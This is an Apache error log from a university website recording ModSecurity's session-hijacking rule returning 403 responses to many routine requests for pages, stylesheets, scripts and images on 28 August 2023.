[Mon Aug 28 07:03:50.374975 2023] [:error] [pid 37426] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOvkZsCo-f0AAJIyV-0AAAAc"]
[Mon Aug 28 07:03:51.946779 2023] [:error] [pid 37312] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvkZ8Co-f0AAJHAkwAAAAAY"]
[Mon Aug 28 07:04:42.579855 2023] [:error] [pid 37451] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOvkmsCo-f0AAJJLqHUAAAAA"]
[Mon Aug 28 07:04:42.872657 2023] [:error] [pid 37465] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvkmsCo-f0AAJJZaY8AAAAE"]
[Mon Aug 28 07:08:54.893499 2023] [:error] [pid 37451] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvllsCo-f0AAJJLqQYAAAAA"]
[Mon Aug 28 07:08:54.919248 2023] [:error] [pid 37401] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvllsCo-f0AAJIZSlsAAAAF"]
[Mon Aug 28 07:08:54.935557 2023] [:error] [pid 37619] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvllsCo-f0AAJLzWKsAAAAC"]
[Mon Aug 28 07:08:55.007655 2023] [:error] [pid 37539] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvll8Co-f0AAJKjZTEAAAAG"]
[Mon Aug 28 07:08:58.425259 2023] [:error] [pid 37312] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvlmsCo-f0AAJHAkysAAAAY"]
[Mon Aug 28 07:09:01.213152 2023] [:error] [pid 37618] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvlncCo-f0AAJLyEFcAAAAH"]
[Mon Aug 28 07:09:01.254307 2023] [:error] [pid 37619] [client 140.213.16.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvlncCo-f0AAJLzWK0AAAAC"]
[Mon Aug 28 07:09:01.495258 2023] [:error] [pid 37312] [client 140.213.16.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvlncCo-f0AAJHAkywAAAAY"]
[Mon Aug 28 07:09:04.152136 2023] [:error] [pid 37401] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvloMCo-f0AAJIZSl4AAAAF"]
[Mon Aug 28 07:09:16.576148 2023] [:error] [pid 37574] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvlrMCo-f0AAJLG-dYAAAAI"]
[Mon Aug 28 07:09:19.595239 2023] [:error] [pid 37401] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvlr8Co-f0AAJIZSmEAAAAF"]
[Mon Aug 28 07:09:21.194694 2023] [:error] [pid 37312] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvlscCo-f0AAJHAkzEAAAAY"]
[Mon Aug 28 07:09:41.347660 2023] [:error] [pid 37313] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvlxcCo-f0AAJHB4w8AAAAD"]
[Mon Aug 28 07:11:31.431574 2023] [:error] [pid 37619] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvmM8Co-f0AAJLzWMsAAAAC"]
[Mon Aug 28 07:11:31.439183 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvmM8Co-f0AAJLwXyEAAAAB"]
[Mon Aug 28 07:11:31.520379 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvmM8Co-f0AAJIsQsQAAAAV"]
[Mon Aug 28 07:11:31.520381 2023] [:error] [pid 37416] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvmM8Co-f0AAJIobCgAAAAR"]
[Mon Aug 28 07:11:31.521902 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvmM8Co-f0AAJHB4ysAAAAD"]
[Mon Aug 28 07:11:31.590769 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvmM8Co-f0AAJIZSoEAAAAF"]
[Mon Aug 28 07:11:31.599080 2023] [:error] [pid 37451] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvmM8Co-f0AAJJLqXgAAAAA"]
[Mon Aug 28 07:11:31.600117 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvmM8Co-f0AAJLwXyIAAAAB"]
[Mon Aug 28 07:11:31.680612 2023] [:error] [pid 37416] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvmM8Co-f0AAJIobCkAAAAR"]
[Mon Aug 28 07:11:31.680636 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvmM8Co-f0AAJIsQsUAAAAV"]
[Mon Aug 28 07:11:31.680744 2023] [:error] [pid 37721] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvmM8Co-f0AAJNZd6EAAAAJ"]
[Mon Aug 28 07:11:31.751493 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvmM8Co-f0AAJHB4ywAAAAD"]
[Mon Aug 28 07:11:31.759090 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOvmM8Co-f0AAJIZSoIAAAAF"]
[Mon Aug 28 07:11:31.839242 2023] [:error] [pid 37451] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOvmM8Co-f0AAJJLqXkAAAAA"]
[Mon Aug 28 07:11:31.840075 2023] [:error] [pid 37721] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvmM8Co-f0AAJNZd6IAAAAJ"]
[Mon Aug 28 07:11:31.912043 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvmM8Co-f0AAJIZSoMAAAAF"]
[Mon Aug 28 07:11:31.918894 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvmM8Co-f0AAJIsQsYAAAAV"]
[Mon Aug 28 07:11:31.920939 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvmM8Co-f0AAJHB4y0AAAAD"]
[Mon Aug 28 07:11:31.921020 2023] [:error] [pid 37416] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvmM8Co-f0AAJIobCoAAAAR"]
[Mon Aug 28 07:11:32.006949 2023] [:error] [pid 37721] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvmNMCo-f0AAJNZd6MAAAAJ"]
[Mon Aug 28 07:11:32.009061 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvmNMCo-f0AAJLwXyMAAAAB"]
[Mon Aug 28 07:11:32.072143 2023] [:error] [pid 37451] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvmNMCo-f0AAJJLqXoAAAAA"]
[Mon Aug 28 07:11:32.078996 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvmNMCo-f0AAJIZSoQAAAAF"]
[Mon Aug 28 07:11:32.079044 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvmNMCo-f0AAJIsQscAAAAV"]
[Mon Aug 28 07:11:32.096852 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvmNMCo-f0AAJHB4y4AAAAD"]
[Mon Aug 28 07:11:32.240366 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvmNMCo-f0AAJLwXyQAAAAB"]
[Mon Aug 28 07:11:35.121453 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOvmN8Co-f0AAJHB4zAAAAAD"]
[Mon Aug 28 07:11:35.239818 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvmN8Co-f0AAJIsQskAAAAV"]
[Mon Aug 28 07:12:11.207156 2023] [:error] [pid 37401] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvmW8Co-f0AAJIZSo8AAAAF"]
[Mon Aug 28 07:12:11.760890 2023] [:error] [pid 37618] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvmW8Co-f0AAJLyENwAAAAH"]
[Mon Aug 28 07:12:44.561713 2023] [:error] [pid 37539] [client 114.5.216.10] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvmfMCo-f0AAJKjZUgAAAAG"]
[Mon Aug 28 07:12:55.603615 2023] [:error] [pid 37619] [client 114.5.209.44] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvmh8Co-f0AAJLzWTwAAAAC"]
[Mon Aug 28 07:12:55.735753 2023] [:error] [pid 37401] [client 114.5.209.44] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvmh8Co-f0AAJIZSp4AAAAF"]
[Mon Aug 28 07:16:52.199885 2023] [:error] [pid 37619] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvndMCo-f0AAJLzWXMAAAAC"]
[Mon Aug 28 07:16:52.199975 2023] [:error] [pid 37758] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvndMCo-f0AAJN@71gAAAAE"]
[Mon Aug 28 07:16:52.515543 2023] [:error] [pid 37401] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvndMCo-f0AAJIZStUAAAAF"]
[Mon Aug 28 07:16:52.578910 2023] [:error] [pid 37313] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvndMCo-f0AAJHB49sAAAAD"]
[Mon Aug 28 07:16:52.593028 2023] [:error] [pid 37721] [client 103.139.10.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvndMCo-f0AAJNZd@sAAAAJ"]
[Mon Aug 28 07:17:00.800463 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvnfMCo-f0AAJJLqZoAAAAA"]
[Mon Aug 28 07:17:00.805431 2023] [:error] [pid 37401] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvnfMCo-f0AAJIZStcAAAAF"]
[Mon Aug 28 07:17:00.878762 2023] [:error] [pid 37721] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvnfMCo-f0AAJNZd@0AAAAJ"]
[Mon Aug 28 07:17:00.879154 2023] [:error] [pid 37758] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvnfMCo-f0AAJN@71kAAAAE"]
[Mon Aug 28 07:17:00.879267 2023] [:error] [pid 37451] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvnfMCo-f0AAJJLqZsAAAAA"]
[Mon Aug 28 07:17:00.879385 2023] [:error] [pid 37618] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvnfMCo-f0AAJLyEXoAAAAH"]
[Mon Aug 28 07:17:00.884702 2023] [:error] [pid 37616] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvnfMCo-f0AAJLwX00AAAAB"]
